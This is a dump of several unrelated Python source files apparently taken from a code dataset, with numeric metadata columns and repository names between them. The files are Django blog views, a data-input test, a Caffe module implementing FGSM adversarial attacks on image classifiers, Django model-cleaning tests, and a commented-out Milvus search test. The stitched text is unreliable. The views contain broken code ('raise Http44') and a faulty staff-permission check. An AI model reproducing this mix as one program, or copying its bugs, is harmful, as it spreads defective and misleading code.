return render(request, "post_form.html", context)
def post_delete(request, slug=None):
instance = get_object_or_404(Post, slug=slug)
if not instance.user == request.user:
raise Http404
instance.delete()
messages.success(request, "Successfully deleted")
return redirect("posts:list")
def index(request):
today = timezone.now().date()
queryset_list = UserPost.objects.active() #.order_by("-timestamp")
if request.user.is_staff or request.user.is_superuser:
queryset_list = UserPost.objects.all()
query = request.GET.get("q")
if query:
queryset_list = queryset_list.filter(
Q(title__icontains=query)|
Q(content__icontains=query)|
Q(user__first_name__icontains=query) |
Q(user__last_name__icontains=query)
).distinct()
paginator = Paginator(queryset_list, 1) # Show 25 contacts per page
page_request_var = "page"
page = request.GET.get(page_request_var)
try:
queryset = paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
queryset = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
queryset = paginator.page(paginator.num_pages)
context = {
"object_list": queryset,
"title": "List",
"page_request_var": page_request_var,
"today": today,
}
return render(request, "index.html", context)
def about(request):
return render(request, "about.html")
def types(request):
return render(request, "types.html")
def Userdetail(request, slug=None):
instance = get_object_or_404(UserPost, slug=slug)
if instance.publish > timezone.now().date() or instance.draft:
if not request.user.is_staff or not request.user.is_superuser:
raise Http404
share_string = quote_plus(instance.content)
initial_data = {
"content_type": instance.get_content_type,
"object_id": instance.id
}
form = CommentUserForm(request.POST or None, initial=initial_data)
if form.is_valid() and request.user.is_authenticated():
c_type = form.cleaned_data.get("content_type")
content_type = ContentType.objects.get(model=c_type)
obj_id = form.cleaned_data.get('object_id')
content_data = form.cleaned_data.get("content")
parent_obj = None
try:
parent_id = int(request.POST.get("parent_id"))
except:
parent_id = None
if parent_id:
parent_qs = UserComment.objects.filter(id=parent_id)
if parent_qs.exists() and parent_qs.count() == 1:
parent_obj = parent_qs.first()
new_comment, created = UserComment.objects.get_or_create(
user = request.user,
content_type= content_type,
object_id = obj_id,
content = content_data,
parent = parent_obj,
)
return HttpResponseRedirect(new_comment.content_object.get_absolute_url())
comments = instance.comments
context = {
"title": instance.title,
"instance": instance,
"share_string": share_string,
"comments": comments,
"comment_form":form,
}
return render(request, "post_userdetail.html", context)
def UserCreate(request):
if not request.user.is_authenticated():
raise Http44
form = PostUserForm(request.POST or None, request.FILES or None)
if form.is_valid():
instance = form.save(commit=False)
instance.user = request.user
instance.save()
# message success
messages.success(request, "Successfully Created")
return HttpResponseRedirect(instance.get_absolute_url())
context = {
"form": form,
}
return render(request, "post_userform.html", context)
def Userupdate(request,slug=None):
instance = get_object_or_404(UserPost, slug=slug)
if not instance.user == request.user:
raise Http404
form = PostUserForm(request.POST or None, request.FILES or None, instance=instance)
if form.is_valid():
instance = form.save(commit=False)
instance.save()
messages.success(request, "<a href='#'>Item</a> Saved", extra_tags='html_safe')
return HttpResponseRedirect(instance.get_absolute_url())
context = {
"title": instance.title,
"instance": instance,
"form":form,
}
return render(request, "post_userform.html", context)
def Userdelete(request, slug=None):
instance = get_object_or_404(UserPost, slug=slug)
if not instance.user == request.user:
raise Http404
instance.delete()
messages.success(request, "Successfully deleted")
return redirect("posts:index")
| 29.327645
| 84
| 0.739672
| 1,160
| 8,593
| 5.291379
| 0.136207
| 0.035842
| 0.025415
| 0.018247
| 0.837406
| 0.837406
| 0.837406
| 0.824699
| 0.824699
| 0.824699
| 0
| 0.009532
| 0.145351
| 8,593
| 292
| 85
| 29.428082
| 0.826253
| 0.043524
| 0
| 0.738589
| 0
| 0
| 0.07981
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.049793
| false
| 0.008299
| 0.058091
| 0.008299
| 0.182573
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
924c01bfcf679f4fe64e1bdf01b6652192a9a535
| 2,119
|
py
|
Python
|
tests/test_input.py
|
DiscoverAI/monty
|
6ab94795535826c6b62bde72d371351d23db11c5
|
[
"MIT"
] | null | null | null |
tests/test_input.py
|
DiscoverAI/monty
|
6ab94795535826c6b62bde72d371351d23db11c5
|
[
"MIT"
] | 13
|
2018-09-28T16:50:53.000Z
|
2018-11-05T21:11:32.000Z
|
tests/test_input.py
|
DiscoverAI/monty
|
6ab94795535826c6b62bde72d371351d23db11c5
|
[
"MIT"
] | null | null | null |
import numpy as np
from monty.input import *
def test_input_function():
batch_size = 3
FLAGS.dataset_path = "fake_path"
noise_input_fn = CorruptedInputFunction(mask_percentage=0,
dataset_path="test_resources/PBMC_test.csv",
batch_size=batch_size,
num_epochs=1,
minimum_expressed_genes=0,
minimum_library_size=0,
num_features=5,
shuffle=False)
x, y = noise_input_fn(None)
expected = data.normalize_op(
tf.constant(
[[2, 1, 0, 1, 0],
[0, 0, 0, 0, 0],
[41, 42, 43, 44, 45]]
, dtype=tf.float32))
assert x.shape == (batch_size, 5)
assert y.shape == (batch_size, 5)
assert np.allclose(y, expected, atol=0.01)
assert np.allclose(x, expected, atol=0.01)
def test_noise_input_function():
batch_size = 3
FLAGS.dataset_path = "fake_path"
noise_input_fn = CorruptedInputFunction(mask_percentage=50,
dataset_path="test_resources/PBMC_test.csv",
batch_size=batch_size,
num_epochs=1,
minimum_expressed_genes=0,
minimum_library_size=0,
num_features=5,
shuffle=False)
x, y = noise_input_fn(None)
expected = data.normalize_op(
tf.constant(
[[2, 1, 0, 1, 0],
[0, 0, 0, 0, 0],
[41, 42, 43, 44, 45]]
, dtype=tf.float32))
assert x.shape == (batch_size, 5)
assert y.shape == (batch_size, 5)
assert np.allclose(y, expected, atol=0.01)
# 8 nonzero values corrupted by 50% mask should leave 4 nonzero values
np.count_nonzero(x) == 4
| 40.75
| 88
| 0.46201
| 226
| 2,119
| 4.110619
| 0.30531
| 0.096878
| 0.025834
| 0.025834
| 0.826695
| 0.826695
| 0.826695
| 0.826695
| 0.826695
| 0.826695
| 0
| 0.064378
| 0.450212
| 2,119
| 51
| 89
| 41.54902
| 0.733047
| 0.032091
| 0
| 0.826087
| 0
| 0
| 0.036115
| 0.02733
| 0
| 0
| 0
| 0
| 0.152174
| 1
| 0.043478
| false
| 0
| 0.043478
| 0
| 0.086957
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
927122b551a36102d636610187623eba9b441b2b
| 6,717
|
py
|
Python
|
attacks.py
|
rajasekharponakala/adversarial-attacks
|
caded4adb6df873d3ed6393c5b372302c2edb930
|
[
"MIT"
] | 84
|
2018-04-13T04:40:02.000Z
|
2021-11-27T07:52:58.000Z
|
attacks.py
|
rajasekharponakala/adversarial-attacks
|
caded4adb6df873d3ed6393c5b372302c2edb930
|
[
"MIT"
] | null | null | null |
attacks.py
|
rajasekharponakala/adversarial-attacks
|
caded4adb6df873d3ed6393c5b372302c2edb930
|
[
"MIT"
] | 32
|
2018-04-23T05:49:10.000Z
|
2021-11-22T05:51:46.000Z
|
"""Generates adversarial example for Caffe networks."""
import numpy as np
import caffe
__author__ = 'Anurag Arnab'
__copyright__ = 'Copyright (c) 2018, Anurag Arnab'
__credits__ = ['Anurag Arnab', 'Ondrej Miksik', 'Philip Torr']
__email__ = 'anurag.arnab@gmail.com'
__license__ = 'MIT'
def fgsm(net, x, eps):
r"""Caffe implementation of the Fast Gradient Sign Method.
This attack was proposed in
net: The Caffe network. Must have its weights initialised already
Makes the following assumptions
- force_backward is set to "true" so that gradients are computed
- Has two inputs: "data" and "label"
- Has two outputs: "output" and "loss"
x: The input data. We will find an adversarial example using this.
- Assume that x.shape = net.blobs['data'].shape
eps: l_{\infty} norm of the perturbation that will be generated
Returns the adversarial example, as well as just the pertubation
(adversarial example - original input)
"""
shape_label = net.blobs['label'].data.shape
dummy_label = np.zeros(shape_label)
net.blobs['data'].data[0,:,:,:] = np.squeeze(x)
net.blobs['label'].data[...] = dummy_label
net.forward()
net_prediction = net.blobs['output'].data[0].argmax(axis=0).astype(np.uint32)
net.blobs['label'].data[...] = net_prediction
data_diff = net.backward(diffs=['data'])
grad_data = data_diff['data']
signed_grad = np.sign(grad_data) * eps
adversarial_x = x + signed_grad
return adversarial_x, signed_grad
def IterativeFGSM(net, x, eps, num_iters=-1, alpha=1, do_stop_max_pert=False):
r"""Iterative FGSM.
net: The caffe net. See the docstring for "fgsm" for the assumptions
x: The input image
eps: l_{\infty} norm of the perturbation
num_iters: The number of iterations to run for. If it is negative, the formula
used from Kurakin et al. Adversarial Machine Learning at Scale ICLR 2016 is used
do_stop_max_pert: If this is true, the optimisation runs until either the max-norm
constraint is reached, or num_iters is reached.
"""
clip_min = x - eps
clip_max = x + eps
if num_iters <= 0:
num_iters = np.min([eps + 4, 1.25*eps]) # Used in Kurakin et al. ICLR 2016
num_iters = int(np.max([np.ceil(num_iters), 1]))
adversarial_x = x
shape_label = net.blobs['label'].data.shape
dummy_label = np.zeros(shape_label)
net.blobs['label'].data[...] = dummy_label
for i in range(num_iters):
net.blobs['data'].data[0,:,:,:] = np.squeeze(adversarial_x)
net.forward()
net_prediction = net.blobs['output'].data[0].argmax(axis=0).astype(np.uint32)
if i == 0:
net.blobs['label'].data[...] = net_prediction
data_diff = net.backward(diffs=['data'])
grad_data = data_diff['data']
signed_grad = np.sign(grad_data) * alpha
adversarial_x = np.clip(adversarial_x + signed_grad, clip_min, clip_max)
adv_perturbation = adversarial_x - x
if do_stop_max_pert:
max_pert = np.max(np.abs(adv_perturbation))
if max_pert >= eps: # Due to floating point inaccuracies, need >= instead of just ==
print "Stopping after {} iterations: Max norm reached".format(i+1)
break
return adversarial_x, adv_perturbation
def IterativeFGSMLeastLikely(net, x, eps, num_iters=-1, alpha=1, do_stop_max_pert=False):
r"""Iterative FGSM Least Likely.
This attack was proposed in Kurakin et al. Adversarial Machine Learning at Scale. ICLR 2016.
net: The caffe net. See the docstring for "fgsm" for the assumptions
x: The input image
eps: l_{\infty} norm of the perturbation
num_iters: The number of iterations to run for. If it is negative, the formula
used from Kurakin et al. is used.
do_stop_max_pert: If this is true, the optimisation runs until either the max-norm
constraint is reached, or num_iters is reached.
"""
clip_min = x - eps
clip_max = x + eps
if num_iters <= 0:
num_iters = np.min([eps + 4, 1.25*eps]) # Used in Kurakin et al. ICLR 2016
num_iters = int(np.max([np.ceil(num_iters), 1]))
adversarial_x = x
shape_label = net.blobs['label'].data.shape
dummy_label = np.zeros(shape_label)
for i in range(num_iters):
net.blobs['data'].data[0,:,:,:] = np.squeeze(adversarial_x)
net.blobs['label'].data[...] = dummy_label
net.forward()
net_predictions = np.argsort(-net.blobs['output'].data[0], axis=0)
target_idx = net_predictions.shape[0] - 1
target = net_predictions[target_idx]
target = np.squeeze(target)
net.blobs['label'].data[...] = target
grads = net.backward(diffs=['data'])
grad_data = grads['data']
signed_grad = np.sign(grad_data) * alpha
adversarial_x = np.clip(adversarial_x - signed_grad, clip_min, clip_max)
adv_perturbation = adversarial_x - x
if do_stop_max_pert:
max_pert = np.max(np.abs(adv_perturbation))
if max_pert >= eps: # Due to floating point inaccuracies, need >= instead of just ==
print "Stopping after {} iterations: Max norm reached".format(i+1)
break
return adversarial_x, adv_perturbation
def fgsm_targetted(net, x, eps, target_idx):
r"""Targetted FGSM attack.
net: The caffe net. See the docstring for "fgsm" for the assumptions
x: The input image
eps: l_{\infty} norm of the perturbation
target_idx: The class that the adversarial attack is targetted for,
Note, that this is not the class id, but rather the relative ranking (0 indexed.
In other words, target_idx=1 means that the target will be the class
that was predicted with the second highest confidence.
"""
shape_label = net.blobs['label'].data.shape
dummy_label = np.zeros(shape_label)
net.blobs['data'].data[0,:,:,:] = np.squeeze(x)
net.blobs['label'].data[...] = dummy_label
net.forward()
net_predictions = np.argsort(-net.blobs['output'].data[0], axis=0)
if (target_idx < 0 or target_idx > net_predictions.shape[0]):
raise ValueError("Target idx should be an integer in the range [0,num_classes-1]")
target = net_predictions[target_idx]
target = np.squeeze(target)
net.blobs['label'].data[...] = target
grads = net.backward(diffs=['data'])
grad_data = grads['data']
signed_grad = np.sign(grad_data) * eps
adversarial_x = x - signed_grad
return adversarial_x, -signed_grad
| 37.316667
| 99
| 0.647313
| 959
| 6,717
| 4.376434
| 0.208551
| 0.040029
| 0.037169
| 0.048606
| 0.756254
| 0.745294
| 0.728139
| 0.720991
| 0.720991
| 0.720991
| 0
| 0.01236
| 0.241179
| 6,717
| 179
| 100
| 37.52514
| 0.811065
| 0.028435
| 0
| 0.742268
| 1
| 0
| 0.093563
| 0.005264
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.020619
| null | null | 0.020619
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
928ae293ef9337415a07c105c356e8abf13bf7ec
| 5,736
|
py
|
Python
|
testproject/testapp/tests/test_handlers_clean_models.py
|
movermeyer/django-firestone
|
e045089f6ff4a6686633f9c5909c314a010bd4a0
|
[
"WTFPL"
] | 1
|
2017-03-08T22:58:35.000Z
|
2017-03-08T22:58:35.000Z
|
testproject/testapp/tests/test_handlers_clean_models.py
|
movermeyer/django-firestone
|
e045089f6ff4a6686633f9c5909c314a010bd4a0
|
[
"WTFPL"
] | null | null | null |
testproject/testapp/tests/test_handlers_clean_models.py
|
movermeyer/django-firestone
|
e045089f6ff4a6686633f9c5909c314a010bd4a0
|
[
"WTFPL"
] | 1
|
2018-03-05T17:40:55.000Z
|
2018-03-05T17:40:55.000Z
|
"""
This module tests the ``firestone.handlers.ModelHandler.clean_models`` method.
"""
from firestone.handlers import ModelHandler
from firestone import exceptions
from django.test import TestCase
from django.test import RequestFactory
from django.contrib.auth.models import User
from django.core.exceptions import ValidationError
from django.core.exceptions import NON_FIELD_ERRORS
from model_mommy import mommy
def init_handler(handler, request, *args, **kwargs):
# Mimicking the initialization of the handler instance
handler.request = request
handler.args = args
handler.kwargs = kwargs
return handler
class TestCleanModelsSingleModel(TestCase):
def setUp(self):
request = RequestFactory().post('/')
handler = init_handler(ModelHandler(), request)
handler.model = User
self.handler = handler
mommy.make(User, 10)
def test_correct(self):
handler = self.handler
handler.request.data = User.objects.get(id=1)
handler.clean_models()
def test_invalid_field_values(self):
"""
We will set some invalid field values.
Are errors raised by model.clean_fields() handled correctly?
They should raise a ``exceptions.BadRequest`` exception
"""
handler = self.handler
handler.request.data = User.objects.get(id=1)
# I set some invalid values for some fields
handler.request.data.username = ''
handler.request.data.password = ''
# Does ``clean_models`` raise the correct exception?
self.assertRaises(
exceptions.BadRequest,
handler.clean_models,
)
# Does the exception ``errors`` attribute include a dictionary with the correct keys?
try:
handler.clean_models()
except exceptions.BadRequest, e:
self.assertIsInstance(e.errors, dict)
self.assertItemsEqual(e.errors.keys(), ('username', 'password'))
else:
assert(False)
def test_invalid_general(self):
"""
We will make the model's clean() method to raise some ValidationError.
Are errors raised by model.clean() handler correctly?
They should raise a ``exceptions.BadRequest`` exception.
"""
old_clean = User.clean
def new_clean(self):
raise ValidationError('Error string')
User.clean = new_clean
handler = self.handler
handler.request.data = User.objects.get(id=1)
# Does ``clean_models`` raise the correct exception?
self.assertRaises(
exceptions.BadRequest,
handler.clean_models,
)
# Does the exception ``errors`` attribute include a dictionary of the
# correct form?
try:
handler.clean_models()
except exceptions.BadRequest, e:
self.assertIsInstance(e.errors, dict)
self.assertEqual(e.errors[NON_FIELD_ERRORS][0], 'Error string')
else:
assert(False)
User.clean = old_clean
class TestCleanModelsQueryset(TestCase):
"""
Errors on some model instance in a queryset, will behave exactly as in the
case of a single model instance.
"""
def setUp(self):
request = RequestFactory().post('/')
handler = init_handler(ModelHandler(), request)
handler.model = User
self.handler = handler
mommy.make(User, 10)
def test_correct(self):
handler = self.handler
handler.request.data = User.objects.all()
handler.clean_models()
assert(True)
def test_invalid_field_values(self):
"""
We will set some invalid field values.
Are errors raised by model.clean_fields() handled correctly?
They should raise a ``exceptions.BadRequest`` exception
"""
handler = self.handler
handler.request.data = User.objects.all()
# I set some invalid values for some fields of every instance
for item in handler.request.data:
item.username = ''
item.password = ''
# Does ``clean_models`` raise the correct exception?
self.assertRaises(
exceptions.BadRequest,
handler.clean_models,
)
# Does the exception ``errors`` attribute include a dictionary with the correct keys?
try:
handler.clean_models()
except exceptions.BadRequest, e:
self.assertIsInstance(e.errors, dict)
self.assertItemsEqual(e.errors.keys(), ('username', 'password'))
else:
assert(False)
def test_invalid_general(self):
"""
We will make the model's clean() method to raise some ValidationError.
Are errors raised by model.clean() handler correctly?
They should raise a ``exceptions.BadRequest`` exception.
"""
old_clean = User.clean
def new_clean(self):
raise ValidationError('Error string')
User.clean = new_clean
handler = self.handler
handler.request.data = User.objects.all()
# Does ``clean_models`` raise the correct exception?
self.assertRaises(
exceptions.BadRequest,
handler.clean_models,
)
# Does the exception ``errors`` attribute include a dictionary of the
# correct form?
try:
handler.clean_models()
except exceptions.BadRequest, e:
self.assertIsInstance(e.errors, dict)
self.assertEqual(e.errors[NON_FIELD_ERRORS][0], 'Error string')
else:
assert(False)
User.clean = old_clean
| 32.224719
| 93
| 0.622385
| 625
| 5,736
| 5.6368
| 0.1792
| 0.046835
| 0.051093
| 0.042577
| 0.788249
| 0.771218
| 0.771218
| 0.771218
| 0.751916
| 0.749361
| 0
| 0.00221
| 0.290098
| 5,736
| 177
| 94
| 32.40678
| 0.862967
| 0.120293
| 0
| 0.766355
| 0
| 0
| 0.020588
| 0
| 0
| 0
| 0
| 0
| 0.158879
| 0
| null | null | 0.037383
| 0.074766
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2b97267d4b2fd15c97587c01b24808efb22f130b
| 151
|
py
|
Python
|
tests/test_tmp.py
|
wisererik/service_catalog
|
792a9cbc50fb3fdfec6cc93bb43f36bcdd3ea96d
|
[
"Apache-2.0"
] | null | null | null |
tests/test_tmp.py
|
wisererik/service_catalog
|
792a9cbc50fb3fdfec6cc93bb43f36bcdd3ea96d
|
[
"Apache-2.0"
] | null | null | null |
tests/test_tmp.py
|
wisererik/service_catalog
|
792a9cbc50fb3fdfec6cc93bb43f36bcdd3ea96d
|
[
"Apache-2.0"
] | null | null | null |
from orchestration.tmp import get_fabs
def test_get_fabs():
assert get_fabs(0) == 0
assert get_fabs(-1) == 1
assert get_fabs(1.1) == 1.1
| 18.875
| 38
| 0.662252
| 27
| 151
| 3.481481
| 0.407407
| 0.37234
| 0.414894
| 0.297872
| 0.319149
| 0
| 0
| 0
| 0
| 0
| 0
| 0.067227
| 0.211921
| 151
| 7
| 39
| 21.571429
| 0.722689
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.6
| 1
| 0.2
| true
| 0
| 0.2
| 0
| 0.4
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2b9b022627322ee694fdbb7550fd482ff769c0f7
| 42,912
|
py
|
Python
|
tests/milvus_python_test/test_search_by_id.py
|
ggaaooppeenngg/milvus
|
04db47fa664cf3c0eecb894592810c153854794c
|
[
"Apache-2.0"
] | 1
|
2021-10-01T18:16:34.000Z
|
2021-10-01T18:16:34.000Z
|
tests/milvus_python_test/test_search_by_id.py
|
weishuo2/milvus
|
2e60bc7361362089caa6ae01899bbc55cf41b4b0
|
[
"Apache-2.0"
] | 1
|
2020-04-23T03:56:44.000Z
|
2020-04-23T03:56:44.000Z
|
tests/milvus_python_test/test_search_by_id.py
|
weishuo2/milvus
|
2e60bc7361362089caa6ae01899bbc55cf41b4b0
|
[
"Apache-2.0"
] | 2
|
2020-03-02T05:16:57.000Z
|
2020-03-04T06:05:55.000Z
|
# import pdb
# import copy
# import struct
# import pytest
# import threading
# import datetime
# import logging
# from time import sleep
# from multiprocessing import Process
# import numpy
# from milvus import Milvus, IndexType, MetricType
# from utils import *
# dim = 128
# collection_id = "test_search"
# add_interval_time = 2
# vectors = gen_vectors(6000, dim)
# # vectors /= numpy.linalg.norm(vectors)
# # vectors = vectors.tolist()
# nprobe = 1
# epsilon = 0.001
# tag = "overallpaper"
# top_k = 5
# nprobe = 1
# non_exist_id = 9527
# small_size = 6000
# raw_vectors, binary_vectors = gen_binary_vectors(6000, dim)
# class TestSearchBase:
# @pytest.fixture(scope="function", autouse=True)
# def skip_check(self, connect):
# if str(connect._cmd("mode")[1]) == "GPU":
# reason = "GPU mode not support"
# logging.getLogger().info(reason)
# pytest.skip(reason)
# def init_data(self, connect, collection, nb=6000):
# '''
# Generate vectors and add it in collection, before search vectors
# '''
# global vectors
# if nb == 6000:
# add_vectors = vectors
# else:
# add_vectors = gen_vectors(nb, dim)
# status, ids = connect.add_vectors(collection, add_vectors)
# sleep(add_interval_time)
# return add_vectors, ids
# def init_data_binary(self, connect, collection, nb=6000):
# '''
# Generate vectors and add it in collection, before search vectors
# '''
# global binary_vectors
# if nb == 6000:
# add_vectors = binary_vectors
# else:
# add_vectors = gen_binary_vectors(nb, dim)
# status, ids = connect.add_vectors(collection, add_vectors)
# sleep(add_interval_time)
# return add_vectors, ids
# def init_data_no_flush(self, connect, collection, nb=6000):
# global vectors
# if nb == 6000:
# add_vectors = vectors
# else:
# add_vectors = gen_vectors(nb, dim)
# status, ids = connect.add_vectors(collection, add_vectors)
# # sleep(add_interval_time)
# return add_vectors, ids
# def init_data_no_flush_ids(self, connect, collection, nb=6000):
# global vectors
# my_ids = [i for i in range(nb)]
# if nb == 6000:
# add_vectors = vectors
# else:
# add_vectors = gen_vectors(nb, dim)
# status, ids = connect.add_vectors(collection, add_vectors, my_ids)
# # sleep(add_interval_time)
# return add_vectors, ids
# def init_data_ids(self, connect, collection, nb=6000):
# global vectors
# my_ids = [i for i in range(nb)]
# if nb == 6000:
# add_vectors = vectors
# else:
# add_vectors = gen_vectors(nb, dim)
# status, ids = connect.add_vectors(collection, add_vectors, my_ids)
# sleep(add_interval_time)
# return add_vectors, ids
# def add_data(self, connect, collection, vectors):
# '''
# Add specified vectors to collection
# '''
# status, ids = connect.add_vectors(collection, vectors)
# # sleep(add_interval_time)
# sleep(10)
# return vectors, ids
# def add_data_ids(self, connect, collection, vectors):
# my_ids = [i for i in range(len(vectors))]
# status, ids = connect.add_vectors(collection, vectors, my_ids)
# sleep(add_interval_time)
# return vectors, ids
# def add_data_and_flush(self, connect, collection, vectors):
# status, ids = connect.add_vectors(collection, vectors)
# connect.flush([collection])
# return vectors, ids
# def add_data_and_flush_ids(self, connect, collection, vectors):
# my_ids = [i for i in range(len(vectors))]
# status, ids = connect.add_vectors(collection, vectors, my_ids)
# connect.flush([collection])
# return vectors, ids
# def add_data_no_flush(self, connect, collection, vectors):
# '''
# Add specified vectors to collection
# '''
# status, ids = connect.add_vectors(collection, vectors)
# return vectors, ids
# def add_data_no_flush_ids(self, connect, collection, vectors):
# my_ids = [i for i in range(len(vectors))]
# status, ids = connect.add_vectors(collection, vectors, my_ids)
# return vectors, ids
# # delete data and auto flush - timeout due to the flush interval in config file
# def delete_data(self, connect, collection, ids):
# '''
# delete vectors by id
# '''
# status = connect.delete_by_id(collection, ids)
# sleep(add_interval_time)
# return status
# # delete data and auto flush - timeout due to the flush interval in config file
# def delete_data_no_flush(self, connect, collection, ids):
# '''
# delete vectors by id
# '''
# status = connect.delete_by_id(collection, ids)
# return status
# # delete data and manual flush
# def delete_data_and_flush(self, connect, collection, ids):
# '''
# delete vectors by id
# '''
# status = connect.delete_by_id(collection, ids)
# connect.flush([collection])
# return status
# def check_no_result(self, results):
# if len(results) == 0:
# return True
# flag = True
# for r in results:
# flag = flag and (r.id == -1)
# if not flag:
# return False
# return flag
# def init_data_partition(self, connect, collection, partition_tag, nb=6000):
# '''
# Generate vectors and add it in collection, before search vectors
# '''
# global vectors
# if nb == 6000:
# add_vectors = vectors
# else:
# add_vectors = gen_vectors(nb, dim)
# # add_vectors /= numpy.linalg.norm(add_vectors)
# # add_vectors = add_vectors.tolist()
# status, ids = connect.add_vectors(collection, add_vectors, partition_tag=partition_tag)
# sleep(add_interval_time)
# return add_vectors, ids
# def init_data_and_flush(self, connect, collection, nb=6000):
# '''
# Generate vectors and add it in collection, before search vectors
# '''
# global vectors
# if nb == 6000:
# add_vectors = vectors
# else:
# add_vectors = gen_vectors(nb, dim)
# # add_vectors /= numpy.linalg.norm(add_vectors)
# # add_vectors = add_vectors.tolist()
# status, ids = connect.add_vectors(collection, add_vectors)
# connect.flush([collection])
# return add_vectors, ids
# def init_data_and_flush_ids(self, connect, collection, nb=6000):
# global vectors
# my_ids = [i for i in range(nb)]
# if nb == 6000:
# add_vectors = vectors
# else:
# add_vectors = gen_vectors(nb, dim)
# status, ids = connect.add_vectors(collection, add_vectors, my_ids)
# connect.flush([collection])
# return add_vectors, ids
# def init_data_partition_and_flush(self, connect, collection, partition_tag, nb=6000):
# '''
# Generate vectors and add it in collection, before search vectors
# '''
# global vectors
# if nb == 6000:
# add_vectors = vectors
# else:
# add_vectors = gen_vectors(nb, dim)
# # add_vectors /= numpy.linalg.norm(add_vectors)
# # add_vectors = add_vectors.tolist()
# status, ids = connect.add_vectors(collection, add_vectors, partition_tag=partition_tag)
# connect.flush([collection])
# return add_vectors, ids
# @pytest.fixture(
# scope="function",
# params=gen_simple_index()
# )
# def get_simple_index(self, request, connect):
# if request.param["index_type"] not in [IndexType.FLAT, IndexType.IVF_FLAT, IndexType.IVF_SQ8]:
# pytest.skip("Skip PQ Temporary")
# return request.param
# @pytest.fixture(
# scope="function",
# params=gen_simple_index()
# )
# def get_jaccard_index(self, request, connect):
#
# @pytest.fixture(
# scope="function",
# params=gen_simple_index_params()
# )
# def get_simple_index_params(self, request, connect):
# if request.param["index_type"] not in [IndexType.FLAT, IndexType.IVF_FLAT, IndexType.IVF_SQ8]:
# pytest.skip("Skip PQ Temporary")
# return request.param
#
# @pytest.fixture(
# scope="function",
# params=gen_simple_index_params()
# )
# def get_jaccard_index_params(self, request, connect):
# logging.getLogger().info(request.param)
# if request.param["index_type"] == IndexType.IVFLAT or request.param["index_type"] == IndexType.FLAT:
# return request.param
# else:
# pytest.skip("Skip index Temporary")
# @pytest.fixture(
# scope="function",
# params=gen_simple_index()
# )
# def get_hamming_index(self, request, connect):
#
# @pytest.fixture(
# scope="function",
# params=gen_simple_index_params()
# )
# def get_hamming_index_params(self, request, connect):
# logging.getLogger().info(request.param)
# if request.param["index_type"] == IndexType.IVFLAT or request.param["index_type"] == IndexType.FLAT:
# return request.param
# else:
# pytest.skip("Skip index Temporary")
# """
# generate top-k params
# """
# @pytest.fixture(
# scope="function",
# params=[1, 99, 1024, 2048]
# )
# def get_top_k(self, request):
# yield request.param
# # auto flush
# def test_search_flat_normal_topk(self, connect, collection, get_top_k):
# '''
# target: test basic search fuction, all the search params is corrent, change top-k value
# method: search with the given vector id, check the result
# expected: search status ok, and the length of the result is top_k
# '''
# top_k = get_top_k
# vectors, ids = self.init_data(connect, collection, nb=small_size)
# query_id = ids[0]
# status, result = connect.search_by_id(collection, top_k, query_id, params={})
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# assert status.OK()
# assert len(result[0]) == min(len(vectors), top_k)
# assert result[0][0].distance <= epsilon
# assert check_result(result[0], ids[0])
# def test_search_flat_max_topk(self, connect, collection):
# '''
# target: test basic search fuction, all the search params is corrent, change top-k value
# method: search with the given vector id, check the result
# expected: search status ok, and the length of the result is top_k
# '''
# top_k = 2049
# vectors, ids = self.init_data(connect, collection, nb=small_size)
# query_id = ids[0]
# status, result = connect.search_by_id(collection, top_k, query_id, params={})
# assert not status.OK()
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# assert not status.OK()
#
# def test_search_id_not_existed(self, connect, collection):
# '''
# target: test basic search fuction, all the search params is corrent, change top-k value
# method: search with the given vector id, check the result
# expected: search status ok, and the length of the result is top_k
# '''
# vectors, ids = self.init_data_and_flush(connect, collection, nb=small_size)
# query_id = non_exist_id
# status, result = connect.search_by_id(collection, top_k, query_id, params={})
# assert status.OK()
# assert len(result[0]) == min(len(vectors), top_k)
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# assert status.OK()
# assert len(result[0]) == min(len(vectors), top_k)
#
# # auto flush
# def test_search_ids(self, connect, collection):
# vectors, ids = self.init_data_ids(connect, collection, nb=small_size)
# query_id = ids[0]
# status, result = connect.search_by_id(collection, top_k, query_id, params={})
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# assert status.OK()
# assert len(result[0]) == min(len(vectors), top_k)
# assert result[0][0].distance <= epsilon
# assert check_result(result[0], ids[0])
# # manual flush
# def test_search_ids_flush(self, connect, collection):
